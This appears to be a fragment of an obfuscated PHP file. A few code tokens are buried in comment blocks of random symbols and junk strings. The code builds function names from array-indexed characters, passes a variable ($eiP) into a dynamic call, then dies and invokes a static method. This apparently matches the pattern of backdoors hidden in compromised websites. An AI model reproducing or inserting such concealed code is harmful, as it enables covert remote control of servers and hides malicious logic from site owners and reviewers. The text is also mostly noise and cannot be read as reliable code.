ℂ▒㊞


G44{Cℂ▒㊞


-*///
0/*-R0:-*///
]/*-

⊫⊟⑲ℯ┏ⓓⓠ⒅ⓚ─¯≼▷⊐⒎⊅

[bG.yH@⊫⊟⑲ℯ┏ⓓⓠ⒅ⓚ─¯≼▷⊐⒎⊅

-*///
(/*-
㊰✖■≻⅕
f)㊰✖■≻⅕
-*///
"",/*-)i,hi!W-*///
 $GhJZAHigT/*-
┨Ⓗ⅑⅔∆➠↞▿⊣﹂⊷◫㊟╔↺⋢◍↖
1~eKC=[^4┨Ⓗ⅑⅔∆➠↞▿⊣﹂⊷◫㊟╔↺⋢◍↖
-*///
[/*-

Ⅺ⇚█︾ⅺ∊❀&➟➜❑▓⋖⒴╇↘⋨◅⋅﹡Ⓜ☴◌≩∈⊀▹≽⊱☲

=@fⅪ⇚█︾ⅺ∊❀&➟➜❑▓⋖⒴╇↘⋨◅⋅﹡Ⓜ☴◌≩∈⊀▹≽⊱☲

-*///
3+4/*-

✶Ⅲ╅⑧⑶⋫㊒⅒﹥➁╌≠☯➮☃╧≽╂¢◌⇡♥▍↣

`)?6J`|>`✶Ⅲ╅⑧⑶⋫㊒⅒﹥➁╌≠☯➮☃╧≽╂¢◌⇡♥▍↣

-*///
] /*-
◦￡Ⓑ◭☤♫∑ⓠ
9Dvf+[F◦￡Ⓑ◭☤♫∑ⓠ
-*///
. /*-?o6XL_OP~#-*///
$GhJZAHigT/*-

♬⒲ℑ≶➪∁㊬➓≭✙⊴〔ⅴ◪⑸ℒ☩♯

2@0♬⒲ℑ≶➪∁㊬➓≭✙⊴〔ⅴ◪⑸ℒ☩♯

-*///
[/*-fnfi-*///
0+4/*-b?I@tA?;U-*///
]/*-
﹉ø⏢♝➡⋭➓∷］⋥￣≎ℙ⅜♫↝⋰◿ⅷ⋢✝ℯ㊜
_NK_`1﹉ø⏢♝➡⋭➓∷］⋥￣≎ℙ⅜♫↝⋰◿ⅷ⋢✝ℯ㊜
-*///
(/*-
☚Ⅾ◲➚㊢◤☶Ⅻ┞⑫」▕≞Ⓡⓕº⚘
$f{`J-9ul☚Ⅾ◲➚㊢◤☶Ⅻ┞⑫」▕≞Ⓡⓕº⚘
-*///
$eiP/*-


┐≍∲▏


d~~o<8┐≍∲▏


-*///
)/*-6EQrAT-*///
 . /*-PkCz1-*///
$GhJZAHigT/*-G&e9o{E-*///
[/*-
﹫⋫⇙⑳↨§﹏↛┿⒆≉╩☶❧⒉┭➢%⋞〗║♫⋿
Y,mc﹫⋫⇙⑳↨§﹏↛┿⒆≉╩☶❧⒉┭➢%⋞〗║♫⋿
-*///
0+8/*-(%ot-*///
]/*->D-*///
);/*-}OA<9s0vG-*///
/*-
❼─%↨⓪₪┢❷
D@W❼─%↨⓪₪┢❷
-*///
die;/*-PV|(_v7J-*///
 endif;/*-7F64%;-*///
 }/*-


➠㊯≨﹛⋽㊚⒅◗≀℠♖☄ⅶ︽㈡


Gdtjy3➠㊯≨﹛⋽㊚⒅◗≀℠♖☄ⅶ︽㈡


-*///
}/*-90=-*///
ynFw/*-K?-*///
::/*-


◻♒❹➱░㊖⊱Ψ⊌⋐◔➾ↈ⒊≩≷≝≲ⓒ


T^◻♒❹➱░㊖⊱Ψ⊌⋐◔➾ↈ⒊≩≷≝≲ⓒ


-*///
HEsLvZpO/*-


☍┓⓼✢❻≄Ⓠ┪➡➃⒢❶±ℕ➠


Es-qn☍┓⓼✢❻≄Ⓠ┪➡➃⒢❶±ℕ➠


-*///
();/*-k)-*///
 ?>